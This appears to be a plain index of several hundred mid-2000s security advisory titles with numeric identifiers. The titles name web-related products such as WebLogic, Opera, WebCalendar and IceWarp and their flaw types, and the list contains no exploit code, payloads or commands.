[16436] AshWebStudio AshNews Remote File Include Vulnerability
[16426] Ashwebstudio Ashnews Cross-Site Scripting Vulnerability
[16391] Phpclanwebsite Multiple Input Validation Vulnerabilities
[16385] Kerio WinRoute Firewall Web Browsing Unspecified Denial of Service Vulnerability
[16371] WeBWorK Remote Arbitrary Command Execution Vulnerability
[16358] BEA WebLogic Multiple Vulnerabilities
[16319] WebspotBlogging Login.PHP SQL Injection Vulnerability
[16315] ELOG Web Logbook Multiple Remote Input Validation Vulnerabilities
[16302] Douran FollowWeb Portal Register.ASPX Cross-Site Scripting Vulnerability
[16300] Phpclanwebsite BBCode IMG Tag Script Injection Vulnerability
[16277] WebMobo WBNews Comments.PHP HTML Injection Vulnerability
[16234] Web Host Automation Ltd. Helm ForgotPassword.ASP Cross-Site Scripting Vulnerability
[16215] BEA WebLogic Server and WebLogic Express MBean Remote Information Disclosure Vulnerability
[16199] Orjinweb Index.PHP Remote File Include Vulnerability
[16196] WebWiz Forums Search_form.ASP Cross-Site Scripting Vulnerability
[16194] Microsoft Windows Embedded Web Font Buffer Overflow Vulnerability
[16175] SysCP WebFTP Module Local File Include Vulnerability
[16161] TheWebForum Multiple Input Validation Vulnerabilities
[16113] Chimera Web Portal Multiple Input Validation Vulnerabilities
[16107] VEGO Web Forum Theme_ID SQL Injection Vulnerability
[16086] VMWare ESX Server Management Interface HTML Injection Vulnerability
[16085] Web Wiz Multiple Products SQL Injection Vulnerability
[16069] IceWarp Universal WebMail Multiple Input Validation Vulnerabilities
[16063] Dev Web Management System Multiple Input Validation Vulnerabilities
[16052] Real Web Solution Statistics Counter Service SQL Injection Vulnerability
[16047] WebWasher Malicious Script Filter Bypass Vulnerability
[16038] Lois Software WebDB Search Module SQL Injection Vulnerability
[15982] Clearswift MIMEsweeper For Web Executable File Bypass Vulnerability
[15948] Hot Banana Web Content Management Suite Cross-Site Scripting Vulnerability
[15937] Adaptive Website Framework Cross-Site Scripting Vulnerability
[15932] ELOG Web Logbook Multiple Remote Buffer Overflow Vulnerabilities
[15929] IBM WebSphere Application Server Sample Scripts Multiple HTML Injection Vulnerabilities
[15920] Round Cube Webmail Path Disclosure Weakness
[15917] WebCal Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
[15916] WebGlimpse Cross-Site Scripting Vulnerability
[15877] MarmaraWeb E-Commerce Remote File Include Vulnerability
[15875] MarmaraWeb E-Commerce Cross-Site Scripting Vulnerability
[15847] PHP Web Scripts Ad Manager Pro Advertiser_statistic.PHP SQL Injection Vulnerability
[15837] PHPWebGallery Multiple SQL Injection Vulnerabilities
[15835] Opera Web Browser Download Dialog Manipulation File Execution Vulnerability
[15819] BTGrup Admin WebController SQL Injection Vulnerability
[15813] Opera Web Browser Long Title Element Bookmark Denial of Service Vulnerability
[15776] Website Baker SQL Injection Vulnerability
[15772] Sun Solaris Sun Update Connection Web Proxy Password Disclosure Vulnerability
[15748] e107 Website System Voting Manipulation Vulnerability
[15718] Web4Future Portal Solutions Arhiva.PHP Directory Traversal Vulnerability
[15717] Web4Future Affiliate Manager PRO Functions.PHP SQL Injection Vulnerability
[15716] Web4Future Portal Solutions Comentarii.PHP SQL Injection Vulnerability
[15715] Web4Future eDating Professional Multiple SQL Injection Vulnerabilities
[15707] Web4Future eCommerce Enterprise Edition Multiple SQL Injection Vulnerabilities
[15702] Web4Future KeyWord Frequency Counter Cross-Site Scripting Vulnerability
[15673] WebCalendar Layers_Toggle.PHP HTTP Response Splitting Vulnerability
[15662] WebCalendar Multiple SQL Injection Vulnerabilities
[15608] WebCalendar Export_Handler.PHP File Corruption Vulnerability
[15606] WebCalendar Multiple SQL Injection Vulnerabilities
[15603] PHP Web Statistik Content Injection Vulnerabilities
[15601] FreeWebStat Multiple Cross-Site Scripting Vulnerabilities
[15587] AllWeb Search SQL Injection Vulnerability
[15574] Athena PHP Website Administration Remote File Include Vulnerability
[15561] Softbiz Web Host Directory Script Multiple SQL Injection Vulnerabilities
[15522] IBM WebSphere Application Server for z/OS Double Free Denial of Service Vulnerability
[15521] Opera Web Browser Arbitrary Command Execution Vulnerability
[15472] Opera Web Browser HTML Form Status Bar Misrepresentation Vulnerability
[15465] PHPWebThings MSG Parameter SQL Injection Vulnerability
[15399] PHPWebThings Download.PHP File Parameter SQL Injection Vulnerability
[15362] SAP Web Application Server URI Redirection Vulnerability
[15361] SAP Web Application Server Multiple Cross-Site Scripting Vulnerabilities
[15360] SAP Web Application Server HTTP Response Splitting Vulnerability
[15331] Multiple Vendor Web Browser Cookie Hostname Handling Weakness
[15303] IBM WebSphere Application Server QueryString Information Disclosure Vulnerability
[15284] F-Secure Web Console Directory Traversal Vulnerability
[15281] Asus VideoSecurity Online Web Server Directory Traversal Vulnerability
[15279] Asus VideoSecurity Online Web Server Authentication Buffer Overflow Vulnerability
[15277] PHPWebThing Forum.PHP SQL Injection Vulnerability
[15276] phpWebThings Forum.PHP Cross-Site Scripting Vulnerability
[15225] Hasbani Web Server Malformed HTTP GET Request Remote Denial of Service Vulnerability
[15188] Symantec Discovery Web Accounts Default Password Vulnerability
[15171] eBASEweb Unspecified SQL Injection Vulnerability
[15124] Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
[15107] RTasarim WebAdmin Login SQL Injection Vulnerability
[15088] PHPWebSite Search Module SQL Injection Vulnerability
[15083] WebGUI Arbitrary Command Execution Vulnerability
[15079] VERITAS NetBackup Java User-Interface Remote Format String Vulnerability
[15064] Microsoft Windows Explorer Web View Script Injection Vulnerability
[15052] BEA WebLogic Server and WebLogic Express Multiple Vulnerabilities
[15016] Webroot Software Desktop Firewall Multiple Local Vulnerabilities
[15011] IBM Tivoli Monitoring Web Health Console Multiple Denial of Service Vulnerabilities
[14991] Virtools Web Player Directory Traversal Vulnerability
[14990] Virtools Web Player Buffer Overflow Vulnerability
[14986] IceWarp Web Mail Directory Traversal Vulnerability
[14981] 4D WebStar Remote IMAP Denial of Service Vulnerability
[14970] Polipo Web Root Restriction Bypass Vulnerability
[14956] CJ Web2Mail Multiple Cross-Site Scripting Vulnerabilities
[14889] Webmin / Usermin Remote PAM Authentication Bypass Vulnerability
[14884] Opera Web Browser Unspecified Drag And Drop File Upload Vulnerability
[14880] Opera Web Browser Mail Client Multiple Vulnerabilities
[14862] Content2Web Multiple Input Validation Vulnerabilities
[14847] AEwebworks aeDating Search_Result.PHP SQL Injection Vulnerability
[14841] Cambridge Computer Corporation VxWeb Remote Buffer Overflow Vulnerability
[14823] Sun Java System Application Server Web Application JAR Disclosure Vulnerability
[14812] Ingate Administrative Interface Cross-Site Scripting Vulnerability
[14788] Sun Java System Web Proxy Server Unspecified Remote Denial Of Service Vulnerability
[14776] Stylemotion WEB//NEWS Multiple SQL Injection Vulnerabilities
[14771] Open WebMail OpenWebmail-main.PL Cross-Site Scripting Vulnerability
[14764] Microsoft IIS WebDAV HTTP Request Source Code Disclosure Vulnerability
[14760] CSystems WebArchiveX ActiveX Component Arbitrary File Read and Write Vulnerabilities
[14747] Man2web Multiple Scripts Command Execution Vulnerability
[14744] SqWebMail HTML Email Script Tag Script Injection Vulnerability
[14732] Plain Black Software WebGUI Remote Perl Command Execution Vulnerabilities
[14717] Multiple Vendor Web Vulnerability Scanners HTML Injection Vulnerability
[14679] PHPWebNotes Api.PHP Remote File Include Vulnerability
[14676] SqWebMail HTML Email IMG Tag Script Injection Vulnerability
[14658] Foojan PHPWeblog HTML Injection Vulnerability
[14657] BEA WebLogic Administration Console Cross-Site Scripting Vulnerability
[14651] WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
[14650] SqWebMail File Attachment Script Injection Vulnerability
[14643] SaveWebPortal Multiple Directory Traversal Vulnerabilities
[14642] SaveWebPortal Multiple Cross Site Scripting Vulnerabilities
[14641] SaveWebPortal Multiple Remote File Include Vulnerabilities
[14639] SaveWebPortal Unauthorized Access Vulnerability
[14632] BEA WebLogic Portal Access Validation Vulnerability
[14586] Xerox MicroServer Web Server Multiple Authentication Bypass and Input Validation Vulnerabilities
[14569] Apple Mac OS X Weblog Server Cross-Site Scripting Vulnerabilities
[14528] Apple Safari Web Browser JavaScript Invalid Address Denial Of Service Vulnerability
[14512] Microsoft Internet Explorer Web Folder Behaviors Cross-Domain Scripting Vulnerability
[14495] E107 Website System Attached File Cross-Site Scripting Vulnerability
[14488] Acunetix Web Vulnerability Scanner Remote Denial of Service Vulnerability
[14473] NetworkActiv Web Server Cross-Site Scripting Vulnerability
[14465] Web Content Management Administrator Account Unauthorized Access Vulnerability
[14464] Web Content Management Multiple Cross-Site Scripting Vulnerabilities
[14455] Metasploit Framework MSFWeb Defanged Mode Restriction Bypass Vulnerability
[14410] Opera Web Browser Image Dragging Cross-Domain Scripting and File Retrieval Vulnerability
[14409] Thomson Web Skill Vantage Manager SQL Injection Vulnerability
[14406] Website Baker Arbitrary File Upload Vulnerability
[14404] Website Baker Browse.PHP Cross-Site Scripting Vulnerability
[14402] Opera Web Browser Content-Disposition Header Download Dialog File Extension Spoofing Vulnerability
[14388] IBM Lotus Domino WebMail Information Disclosure Vulnerability
[14385] SPI Dynamics WebInspect Cross Application Script Injection Vulnerability
[14363] Beehive Forum Webtag Multiple Cross-Site Scripting Vulnerabilities
[14361] Beehive Forum Webtag Multiple SQL Injection Vulnerabilities
[14341] DXXO Count Web Statistics Multiple SQL Injection Vulnerabilities
[14338] Website Generator Multiple Remote Cross Site Scripting Vulnerabilities
[14337] Website Generator Remote Code Execution Vulnerability
[14310] Novell GroupWise WebAccess HTML Injection Vulnerability
[14301] e107 Website System Nested BBCode URL Tag Script Injection Vulnerability
[14279] Oracle Webcache SSL Encryption Downgrade Weakness
[14249] ESi WebEOC Multiple Input Validation Privilege Escalation and Denial of Service Vulnerabilities
[14248] Clearswift MIMEsweeper For Web ActiveX Bypass Vulnerability
[14207] Web Wiz Forums Information Disclosure Vulnerability
[14192] 4D WebStar Unspecified Vulnerability
[14172] PHPWebSite Index.PHP Multiple SQL Injection Vulnerabilities
[14166] PHPWebSite Index.PHP Directory Traversal Vulnerability
[14118] Webmatic Unspecified Vulnerabilities
[14083] Dynamic Biz Website Builder (QuickWeb) Login.ASP SQL Injection Vulnerability
[14072] WebCalendar Assistant_Edit.PHP Unauthorized Access Vulnerability
[14031] Asterisk Manager Interface Command Processing Remote Buffer Overflow Vulnerability
[14025] Veritas Backup Exec Web Administration Console Remote Buffer Overflow Vulnerability
[14010] ICab Web Browser Dialog Box Origin Spoofing Vulnerability
[14009] Opera Web Browser Dialog Box Origin Spoofing Vulnerability
[13988] Sun ONE/iPlanet Messaging Server Webmail MSIE HTML Injection Vulnerability
[13974] e107 Website System Multiple Input Validation and Information Disclosure Vulnerabilities
[13970] Opera Web Browser XMLHttpRequest Object Cross-Domain Access Vulnerability
[13969] Opera Web Browser Cross-Site Scripting Local File Disclosure Vulnerability
[13952] Microsoft Exchange Server Outlook Web Access HTML Injection Vulnerability
[13950] Microsoft Windows Web Client Service Remote Code Execution Vulnerability
[13946] Microsoft Internet Explorer Unspecified DigWebX ActiveX Control Vulnerability
[13945] Sun Java Web Start Unspecified Privilege Escalation Vulnerability
[13930] Darryl Burgdorf Webhints Remote Command Execution Vulnerability
[13912] IBM AIX diagTasksWebSM Command Line Argument Local Buffer Overflow Vulnerability
[13890] ObjectWeb Consortium C-JDBC Query Result Cache Disclosure Vulnerability
[13859] WWWeb Concepts Events System LOGIN.ASP SQL Injection Vulnerability
[13853] IBM WebSphere Application Server Administrative Console Buffer Overflow Vulnerability
[13851] Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
[13850] LiteWeb Server Authentication Bypass Vulnerability
[13834] NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability
[13819] MyBB Website Field HTML Injection Vulnerability
[13811] NikoSoft WebMail Unspecified Cross-Site Scripting Vulnerability
[13807] Newmad Technologies PicoWebServer Remote Buffer Overflow Vulnerability
[13794] BEA WebLogic Administration Console Error Page Cross-Site Scripting Vulnerability
[13793] BEA WebLogic Administration Console LoginForm.jsp Cross-Site Scripting Vulnerability
[13780] Gentoo Webapp-Config Insecure File Creation Vulnerability
[13762] MaxWebPortal Password.ASP SQL Injection Vulnerability
[13730] Distinct Web Creations NewsletterEZ Login.ASP SQL Injection Vulnerability
[13722] Sambar Server Administrative Interface Multiple Cross-Site Scripting Vulnerabilities
[13717] BEA WebLogic Server and WebLogic Express Multiple Remote Vulnerabilities
[13653] Fastream NETFile FTP/Web Server FTP Bounce Vulnerability
[13640] Sigma ISP Manager Sigmaweb.DLL SQL Injection Vulnerability
[13607] Microsoft Windows Media Player Digital Rights Management Arbitrary Web Page Launch Weakness
[13601] MaxWebPortal Multiple Remote Vulnerabilities
[13577] e107 Website System Global Variables Unauthorized Access Vulnerability
[13576] e107 Website System Forum_viewforum.PHP SQL Injection Vulnerability
[13573] e107 Website System Request.PHP Directory Traversal Vulnerability
[13572] e107 Website System Search.PHP Remote File Include Vulnerability
[13538] 4D WebStar Tomcat Plugin Remote Buffer Overflow Vulnerability
[13524] RSA Security RSA Authentication Agent For Web Remote Heap Buffer Overflow Vulnerability
[13521] 04WebServer Directory Traversal Vulnerability
[13501] YusASP Web Asset Manager Unauthorized Access Vulnerability
[13482] WebCrossing WebX Cross-Site Scripting Vulnerability
[13472] Open WebMail Remote Arbitrary Shell Command Execution Vulnerability
[13466] MaxWebPortal Multiple SQL Injection Vulnerabilities
[13459] Video Cam Server Administrative Interface Authentication Bypass Vulnerability
[13428] Just William's Amazon Webstore HTTP Response Splitting Vulnerability
[13427] Just William's Amazon Webstore CurrentNumber Parameter Cross-Site Scripting Vulnerability
[13426] Just William's Amazon Webstore SearchFor Parameter Cross-Site Scripting Vulnerability
[13425] Just William's Amazon Webstore CurrentIsExpanded Parameter Cross-Site Scripting Vulnerability
[13422] Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting Vulnerability
[13421] Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability
[13420] Oracle Application Server 9i Webcache Arbitrary File Corruption Vulnerability
[13419] Just William's Amazon Webstore Closeup.PHP Image Parameter Cross-Site Scripting Vulnerability
[13400] BEA WebLogic Server And WebLogic Express Administration Console Cross-Site Scripting Vulnerability
[13388] Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability
[13378] MySQL MaxDB WebDAV IF Parameter Remote Buffer Overflow Vulnerability
[13374] SQWebmail HTTP Response Splitting Vulnerability
[13369] MySQL MaxDB WebDAV Lock Token Remote Buffer Overflow Vulnerability
[13349] IBM WebSphere Application Server Error Page Cross-Site Scripting Vulnerability
[13293] NetMailshar Professional Webmail Service Directory Traversal Vulnerability
[13268] Sun Java System Web Proxy Server Multiple Unspecified Remote Buffer Overflow Vulnerabilities
[13263] WheresJames Webcam Publisher Web Server Buffer Overflow Vulnerability
[13262] GeneWeb Maintainer Scripts Unspecified Insecure File Operations Vulnerability
[13250] WebcamXP Chat Name HTML Code Injection Vulnerability
[13240] F5 BIG-IP User Interface Login Credential Caching Vulnerability
[13227] PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability
[13205] Webmin And Usermin Configuration File Unauthorized Access Vulnerability
[13202] Apple WebCore Framework XMLHttpRequests Remote Code Execution Vulnerability
[13198] Xerox MicroServer Web Server Default Account Authentication Bypass Vulnerability
[13180] Kerio MailServer WebMail Remote Resource Exhaustion Vulnerability
[13168] RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
[13165] Sun Java System Web Server Unspecified Denial of Service Vulnerability
[13160] IBM WebSphere Application Server Web Server Root JSP Source Code Disclosure Vulnerability
[13113] AEwebworks Dating Software AeDating Control Panel Cross-Site Scripting Vulnerability
[13111] AEwebworks Dating Software AeDating Sdating.PHP SQL Injection Vulnerability
[13108] AEwebworks Dating Software AeDating Index.PHP Local File Include Vulnerability
[13101] WebCT Discussion Board HTML Injection Vulnerability
[13081] Citrix MetaFrame Web Client Access Restriction Bypass Vulnerability
[13078] Microsoft Outlook and Outlook Web Access Source Email Address Spoofing Weakness
[13074] Maxthon Web Browser Plug-in API Directory Traversal Vulnerability
[13073] Maxthon Web Browser Plug-in API Security ID Information Disclosure Vulnerability
[13055] PHP-Nuke Web_Links Module Multiple SQL Injection Vulnerabilities
[13045] IBM Lotus Domino Server Web Service Remote Denial Of Service Vulnerability
[13037] WebWasher Conf Script Cross-Site Scripting Vulnerability
[13025] PHP-Nuke Web_Links Module Multiple Cross-Site Scripting Vulnerabilities
[12938] WebAPP Unspecified File Disclosure Vulnerability
[12937] FastStone 4in1 Browser Web Server Remote Directory Traversal Vulnerability
[12898] Maxthon Web Browser Search Bar Information Disclosure Vulnerability
[12847] Sun Java Web Start System Property Tags Remote Unauthorized Access Vulnerability
[12842] Webroot My Firewall Local Insecure File Creation Vulnerability
[12834] Microsoft Windows Graphical Device Interface Library Denial Of Service Vulnerability
[12812] IBM WebSphere Application Server Remote Information Disclosure Vulnerability
[12805] MySQL MaxDB WebAgent Input Validation Multiple Remote Denial Of Service Vulnerabilities
[12783] Xerox Document Centre ESS/Network Controller Web Server Remote Authentication Bypass Vulnerability
[12782] Xerox MicroServer Web Server Remote Denial Of Service Vulnerability
[12778] PY Software Active Webcam Webserver Multiple Vulnerabilities
[12773] WEBInsta Mailing Manager Remote File Include Vulnerability
[12747] Jason Hines PHPWebLog Remote File Include Vulnerability
[12731] Xerox Microserver Web Server Unspecified Remote Authorization Bypass Vulnerability
[12679] WebMod Content-Length Remote Heap Overflow Vulnerability
[12662] CIS WebServer Remote Directory Traversal Vulnerability
[12653] PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
[12640] ELOG Web Logbook Multiple Remote Unspecified Vulnerabilities
[12639] ELOG Web Logbook Attached Filename Remote Buffer Overflow Vulnerability
[12613] OpenConnect WebConnect Multiple Remote Vulnerabilities
[12606] Xinkaa WEB Station Directory Traversal Vulnerability
[12581] WebCalendar SQL Injection Vulnerability
[12556] ELOG Web Logbook Multiple Remote Vulnerabilities
[12550] Opera Web Browser Multiple Remote Vulnerabilities
[12548] BEA WebLogic Server And WebLogic Express Authentication Failure Information Disclosure Weakness
[12547] Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability
[12538] IBM WebSphere Application Server File Servlet Source Code Disclosure Vulnerability
[12537] IBM WebSphere Application Server JSP Engine Source Code Disclosure Vulnerability
[12532] Gentoo Portage-Built Webmin Binary Package Build Host Root Password Disclosure Vulnerability
[12461] Multiple Web Browser International Domain Name Handling Site Property Spoofing Vulnerabilities
[12459] Microsoft Outlook Web Access Login Form Remote URI Redirection Vulnerability
[12429] Savant Web Server Remote Buffer Overflow Vulnerability
[12416] Eternal Lines Web Server Remote Denial Of Service Vulnerability
[12399] Captaris Infinite Mobile Delivery Webmail Path Disclosure Vulnerability
[12396] IceWarp Web Mail Multiple Remote Vulnerabilities
[12395] Alt-N WebAdmin Multiple Remote Vulnerabilities
[12394] WebWasher Classic HTTP CONNECT Unauthorized Access Weakness
[12313] MySQL MaxDB WebAgent Remote Denial of Service Vulnerabilities
[12310] Novell GroupWise WebAccess Multiple Cross-Site Scripting Vulnerabilities
[12285] Novell GroupWise WebAccess Remote Authentication Bypass Vulnerability
[12275] Squid Proxy Web Cache Communication Protocol Denial Of Service Vulnerability
[12265] MySQL MaxDB WebAgent WebSQL Password Parameter Remote Buffer Overflow Vulnerability
[12260] Sun Solaris Management Console User Interface Insecure Account Creation Vulnerability
[12231] Bottomline Technologies WebSeries Design Error Vulnerabilities
[12216] BottomLine Webseries Payment Application Access Control Bypass Vulnerability
[12203] Dillo Interface Message Format String Vulnerability
[12194] Novell GroupWise WebAccess Potential Information Disclosure Vulnerability
[12183] Jeuce Personal Web Server Directory Traversal And Denial Of Service Vulnerabilities
[12164] IceWarp Merak Mail Server Unspecified Web Admin Vulnerability
[12143] IceWarp Web Mail Session ID Disclosure Vulnerability
[12140] IWebNegar Multiple Remote Vulnerabilities
[12132] KorWeblog Remote File Include Vulnerability
[12090] IceWarp Web Mail Directory Traversal Vulnerability
[12086] NetWin SurgeMail Webmail Unspecified Vulnerability
[12069] PHPAuction Administrative Interface Authentication Bypass Vulnerability
[12065] Webroot Software Spy Sweeper Enterprise Local Privilege Escalation Vulnerability
[12064] Webroot Software My Firewall Plus Local Privilege Escalation Vulnerability
[12023] PGN2WEB Buffer Overflow Vulnerability
[12016] UML_Utilities UML_Net Slip Network Interface Denial Of Service Vulnerability
[11972] Sun ONE/iPlanet Messaging Server Webmail HTML Injection Vulnerability
[11949] Apple Safari Web Browser HTML Form Status Bar Misrepresentation Vulnerability
[11946] IWebNegar Multiple SQL Injection Vulnerabilities
[11918] Sun Java System Web And Application Server Remote Session Disclosure Vulnerability
[11901] Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
[11894] PhpGedView Gdbi_interface.PHP Cross-Site Scripting Vulnerability
[11883] Opera Web Browser Download Dialogue Box File Name Spoofing Vulnerability
[11876] ICab Web Browser Remote Window Hijacking Vulnerability
[11875] Omni Group OmniWeb Browser Remote Window Hijacking Vulnerability
[11856] Opera Web Browser Remote Window Hijacking Vulnerability
[11848] Darryl Burgdorf WebLibs Directory Traversal Vulnerability
[11844] MySQL MaxDB WebDav Handler Overwrite Header Remote Buffer Overflow Vulnerability
[11816] IBM WebSphere Commerce Default User Information Disclosure Vulnerability
[11773] Groupmax World Wide Web Cross-Site Scripting And Directory Traversal Vulnerabilities
[11762] Opera Web Browser Infinite Array Sort Denial Of Service Vulnerability
[11761] Mozilla Camino Web Browser Infinite Array Sort Denial Of Service Vulnerability
[11759] Apple Safari Web Browser Infinite Array Sort Denial Of Service Vulnerability
[11744] KorWeblog Remote Directory Listing Vulnerability
[11727] Plain Black Software WebGUI Unspecified Remote Vulnerability
[11717] Computer Associates eTrust EZAntivirus User Interface Local Authentication Bypass Vulnerability
[11712] Opera Web Browser Java Implementation Multiple Remote Vulnerabilities
[11687] Fastream NetFile FTP/Web Server HEAD Request Denial Of Service Vulnerability
[11673] PHPWebSite User Module HTTP Response Splitting Vulnerability
[11652] 04WebServer Multiple Remote Vulnerabilities
[11651] WebCalendar Multiple Remote Vulnerabilities
[11636] Sun One/IPlanet Messaging Server Webmail Unauthorized Email Access Vulnerability
[11611] IceWarp Web Mail Multiple Remote Vulnerabilities
[11605] Microsoft ISA and Proxy Server Web Site Spoofing Vulnerability
[11593] Sun Java System Web And Application Servers Remote Denial Of Service Vulnerability
[11588] Webroot Software Spy Sweeper Enterprise Plain Text Password Storage Weakness
[11586] WebHost Automation Helm Control Panel Multiple Input Validation Vulnerabilities
[11585] Minihttp Forum Web Server Plain Text Password Storage Vulnerability
[11578] MailEnable Professional Webmail Unspecified Vulnerability
[11573] Apple Safari Web Browser TABLE Status Bar URI Obfuscation Weakness
[11566] Sun Java System Web Proxy Server Multiple Unspecified Buffer Overflow Vulnerabilities
[11562] Global Spy Software Cyber Web Filter IP Filter Bypass Vulnerability
[11544] Omni Group OmniWeb Browser Cross-Domain Dialog Box Spoofing Vulnerability
[11531] ICab Web Browser Cross-Domain Dialog Box Spoofing Vulnerability
[11476] Maxthon Web Browser Cross-Domain Tab Window Form Field Focus Vulnerability
[11475] Opera Web Browser Cross-Domain Dialog Box Spoofing Vulnerability
[11470] Maxthon Web Browser Cross-Domain Dialog Box Spoofing Vulnerability
[11426] Express-Web Content Management System Unspecified Cross-Site Scripting Vulnerability
[11399] IBM DB2 Stored Procedure Interface Library Name Buffer Overflow Vulnerability
[11398] IBM DB2 Application Programming Interface Multiple Unspecified Buffer Overflow Vulnerabilities
[11371] IceWarp Web Mail Multiple Unspecified Remote Input Validation Vulnerabilities
[11346] MySQL MaxDB WebDBM Server Name Denial of Service Vulnerability
[11342] Microsoft ASP.NET URI Canonicalization Unauthorized Web Access Vulnerability
[11326] NetworkActiv Web Server Remote Denial of Service Vulnerability
[11307] RealNetworks RealOne Player And RealPlayer Unspecified Web Page Code Execution Vulnerability
[11254] MyWebServer Multiple Remote Vulnerabilities
[11246] Full Revolution aspWebCalendar and aspWebAlbum Multiple SQL Injection Vulnerabilities
[11234] AllWebScripts MySQLGuest HTML Injection Vulnerability
[11209] Business Objects WebIntelligence Remote File Name HTML Injection Vulnerability
[11208] Business Objects WebIntelligence Access Control Bypass File Deletion Vulnerability
[11188] HP Web Jetadmin Unspecified Arbitrary Command Execution Vulnerability
[11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
[11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
[11168] Multiple BEA Systems WebLogic Vulnerabilities
[11153] Webmin / Usermin Installation Insecure Temporary File Creation Vulnerability
[11122] Webmin / Usermin HTML Email Command Execution Vulnerability
[11090] Opera Web Browser Empty Embedded Object JavaScript Denial Of Service Vulnerability
[11088] PHPWebSite Multiple Input Validation Vulnerabilities
[11073] Web Animations Password Protect Multiple Input Validation Vulnerabilities
[11071] Xedus Web Server Multiple Vulnerabilities
[11054] Webroot Software Window Washer Data Exposure Vulnerability
[11045] Webmatic Unspecified Security Vulnerability
[11037] Dynix WebPac Multiple Undisclosed SQL Injection Vulnerabilities
[11036] Easy File Sharing Web Server Remote Denial Of Service Vulnerability
[11034] Easy File Sharing Web Server Access Control Bypass Vulnerability
[11028] Web-APP.Org WebAPP Directory Traversal Vulnerability
[11000] Novell NetWare Web Manager Unspecified Vulnerability
[10999] Safari/WebCore HTTP Content Filtering Bypass Vulnerability
[10998] Multiple Vendor Web Browser JavaScript Denial Of Service Vulnerability
[10997] Opera Web Browser JavaScript Denial Of Service Vulnerability
[10988] Nihuo Web Log Analyzer HTML Injection Vulnerability
[10983] Working Resources BadBlue Webserver Denial Of Service Vulnerability
[10966] Merak Mail Server Webmail Multiple Vulnerabilities
[10961] Opera Web Browser Resource Detection Weakness
[10942] PHPMyWebHosting SQL Injection Vulnerability
[10920] IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
[10918] Clearswift MIMEsweeper For Web Directory Traversal Vulnerability
[10902] Microsoft Exchange Outlook Web Access HTTP Response Splitting Vulnerability
[10869] Neon WebDAV Client Library Unspecified Vulnerability
[10863] Multiple Free Web Chat Denial Of Service Vulnerabilities
[10842] Webbsyte Chat Denial Of Service Vulnerability
[10840] U.S. Robotics USR808054 Wireless Access Point Web Administration Denial Of Service Vulnerability
[10837] Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting Vulnerability
[10832] Mozilla Firefox XML User Interface Language Browser Interface Spoofing Vulnerability
[10818] Hitachi Web Page Generator Cross-Site Scripting and Information Disclosure Vulnerabilities
[10817] Hitachi Web Page Generator Unspecified Denial Of Service Vulnerability
[10810] Opera Web Browser Location Replace URI Obfuscation Weakness
[10792] EasyWeb FileManager Module Directory Traversal Vulnerability
[10780] Samba Web Administration Tool Base64 Decoder Buffer Overflow Vulnerability
[10773] Leigh Business Enterprises Web HelpDesk SQL Injection Vulnerability
[10771] Internet Software Sciences Web+Center Cookie Object SQL Injection Vulnerability
[10764] Opera Web Browser Unspecified Certificate Verification Vulnerability
[10763] Opera Web Browser Cross-Domain Frame Loading Vulnerability
[10756] Outblaze Webmail HTML Injection Vulnerability
[10746] Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability
[10744] Extropia WebStore Remote Command Execution Vulnerability
[10735] AnomicHTTPProxy Administrative Interface Denial Of Service Vulnerability
[10733] AnomicHTTPProxy Administrative Interface Authentication Bypass Vulnerability
[10721] 4D WebStar Multiple Remote Information Disclosure Vulnerabilities
[10720] 4D WebStar Remote FTP Buffer Overflow Vulnerability
[10719] INweb Mail Server Remote Denial Of Service Vulnerability
[10714] 4D WebStar Symbolic Link Vulnerability
[10679] Opera Web Browser IFrame OnLoad Address Bar URL Obfuscation Weakness
[10673] Mbedthis Software AppWeb HTTP Server Multiple Vulnerabilities
[10667] Open WebMail Email Header HTML Injection Vulnerability
[10666] BasiliX Webmail Email Header HTML Injection Vulnerability
[10658] Fastream NetFile FTP/Web Server Directory Traversal Vulnerability
[10651] IBM Websphere Edge Server Denial Of Service Vulnerability
[10641] IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
[10637] Open WebMail Vacation.PL Remote Command Execution Variant Vulnerability
[10630] HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerability
[10628] Dr. Web Unspecified Buffer Overflow Vulnerability
[10624] BEA WebLogic Server And WebLogic Express Application Role Unauthorized Access Vulnerability
[10614] WebSoft Infinity WEB SQL Injection Vulnerability
[10613] WebSoft HelpDesk PRO SQL Injection Vulnerability
[10592] ArbitroWeb PHP Proxy Cross-Site Scripting Vulnerability
[10588] SqWebMail Email Header HTML Injection Vulnerability
[10585] Multiple Vendor Broadband Router Web-Based Administration Denial Of Service Vulnerability
[10555] Web Wiz Forums Registration_Rules.ASP Cross-Site Scripting Vulnerability
[10545] BEA WebLogic Server And WebLogic Express Java RMI Incorrect Session Inheritance Vulnerability
[10544] BEA WebLogic Server And WebLogic Express Remote Denial of Service Vulnerability
[10533] Linksys Web Camera Software Next_file Parameter Cross-Site Scripting Vulnerability
[10523] Webmin And Usermin Account Lockout Bypass Vulnerability
[10522] Webmin Configuration Module Information Disclosure Vulnerability
[10510] Billion BIPAC-640 AE Administrative Interface Authentication Bypass Vulnerability
[10483] NetWin SurgeMail/WebMail Multiple Input Validation Vulnerabilities
[10482] Microsoft ISA Server Redirect URI Handler Web Proxy Service Remote Denial Of Service Vulnerability
[10477] Microsoft ISA Server Web Proxy Malformed SSL Packet Remote Denial of Service Vulnerability
[10476] Linksys Web Camera Software Next_file Parameter File Disclosure Vulnerability
[10474] Webmin Multiple Unspecified Vulnerabilities
[10445] Rit Research Labs TinyWeb Server Unauthorized Script Disclosure Vulnerability
